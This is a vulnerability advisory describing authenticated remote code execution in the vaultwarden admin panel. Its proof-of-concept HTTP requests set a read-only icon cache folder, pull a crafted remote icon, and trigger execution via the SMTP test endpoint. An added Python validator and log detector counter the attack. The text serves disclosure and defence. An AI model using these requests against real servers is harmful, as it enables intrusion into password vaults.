Summary
An attacker with authenticated access to the vaultwarden admin panel can execute arbitrary code on the system.
PoC
Specify the settings as shown in the image below.

Then set the read-only option "Icon cache folder" by sending the POST /admin/config request manually:
POST /admin/config HTTP/1.1
Host: 127.0.0.1:8001
Content-Type: application/json
Cookie: VW_ADMIN=
{
...
"icon_cache_folder":"/@icon"
}
Execute the following command to craft the payload:

After that, serve an image named apple-touch-icon.png or favicon.ico on a remote server.
Download it to the vaultwarden host with a GET /icons/site.com/icon.png request.
We can now see the @icon directory and the site.com.png file on the vaultwarden host.

Finally, make an HTTP request to execute the code:
POST /admin/test/smtp HTTP/1.1
Host: 127.0.0.1:8001
Cookie: VW_ADMIN=<JWT>
{"email":"[email protected]"}
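As an added defensive example (not part of this advisory and not vaultwarden's own code), the check below rejects a POST /admin/config body that changes a setting the admin UI marks read-only, keeps the effective icon cache folder confined to an allowed base directory, and flags clients in an access log that changed the config and then called /admin/test/smtp. The read-only allowlist, the base directory and the log format are assumptions.

```python
import json
import re
from pathlib import Path

# Assumption: settings the admin UI marks read-only; a manual
# POST /admin/config must not be able to change them.
READ_ONLY_SETTINGS = {"icon_cache_folder"}
# Assumption: directory the icon cache is allowed to live under.
ICON_CACHE_BASE = Path("/data/icon_cache")


def validate_config_update(body: bytes, current: dict) -> dict:
    """Return the merged config, or raise ValueError with the reason."""
    try:
        update = json.loads(body)
    except json.JSONDecodeError as exc:
        raise ValueError(f"malformed JSON: {exc}")
    if not isinstance(update, dict):
        raise ValueError("config body must be a JSON object")
    for key, value in update.items():
        if key in READ_ONLY_SETTINGS and value != current.get(key):
            raise ValueError(f"{key} is read-only and cannot be set here")
    merged = {**current, **update}
    # Defence in depth: the path in effect must resolve to the base or below it.
    folder = Path(merged.get("icon_cache_folder", ICON_CACHE_BASE)).resolve()
    base = ICON_CACHE_BASE.resolve()
    if folder != base and base not in folder.parents:
        raise ValueError("icon_cache_folder escapes the icon cache base")
    return merged


# Common-log-style access line (constructed format, not vaultwarden's).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/')


def flag_admin_sequence(lines):
    """Clients that POSTed /admin/config and later POSTed /admin/test/smtp."""
    changed, flagged = set(), []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path = m.group("ip", "method", "path")
        if method == "POST" and path == "/admin/config":
            changed.add(ip)
        elif method == "POST" and path == "/admin/test/smtp" and ip in changed:
            flagged.append(ip)
    return flagged


SAMPLE_LOG = [  # constructed sample lines
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "POST /admin/config HTTP/1.1" 200 2',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "POST /admin/test/smtp HTTP/1.1" 200 2',
    '10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "POST /admin/test/smtp HTTP/1.1" 200 2',
]
```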
